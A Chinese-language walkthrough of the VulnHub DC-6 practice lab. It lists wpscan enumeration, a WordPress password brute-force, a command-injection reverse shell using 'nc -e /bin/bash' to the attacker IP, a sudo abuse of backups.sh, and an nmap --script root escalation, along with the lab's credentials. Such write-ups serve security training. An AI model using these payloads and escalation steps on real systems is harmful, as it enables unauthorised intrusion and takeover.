DC6

靶机地址：https://www.vulnhub.com/entry/dc-6,315/

攻击者IP：192.168.56.108 桥接（自动） vmare

受害者ip：192.168.56.119 仅主机 vmbox

https://www.freebuf.com/articles/web/261226.html

https://blog.csdn.net/weixin_45996361/article/details/123431118

https://www.cnblogs.com/sym945/p/13915114.html

主机发现

端口扫描

访问web页面

跟dc2一样的问题，修改hosts

vim /etc/hosts

Windows系统：C:WindowsSystem32driversetc

wordpress框架

目录扫描，找到后台地址

#指定url，枚举其中的用户名

wpscan --url http://wordy -e u

WordPress version 5.1.1

admin            jens            graham            mark            sarah            

把用户名塞到use.txt

爆破用户名和密码

wpscan --url http://wordy -U use.txt -P /usr/share/wordlists/rockyou.txt

密码本太大了，官方有提示可以大幅缩短爆破时间

cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt

wpscan --url http://wordy -U use.txt -P pwd.txt

mark/helpdesk01

找到命令执行漏洞

反弹shell

127.0.0.1|nc -e /bin/bash/ 192.168.56.108 2222            

修改前端验证

查看隐私文件，找到graham - GSo7isUM1D4

sudo -l，发现无密码使用的命令为jens目录下的backups.sh命令

sudo -l            User graham may run the following commands on dc-6:            (jens) NOPASSWD: /home/jens/backups.sh            # 看看当前用户拥有的权限，可以对backups.sh执行写操作            cd /home/jens            # 写入/bin/bash，执行，切换到jens的shell            echo "/bin/bash" >> backups.sh            sudo -u jens ./backups.sh            # 发现可以以root权限执行nmap            sudo -l            User jens may run the following commands on dc-6:            (root) NOPASSWD: /usr/bin/nmap            #发现可以用root权限执行nmap，nmap在早期版本是可以用来提权的将提权代os.execute("/bin/sh")写入一个文件中。            # nmap提权：以root的权限用nmap执行这个脚本            echo "os.execute('/bin/bash')" > getshell            sudo nmap --script=getshell            

原文始发于微信公众号（王之暴龙战神）：DC6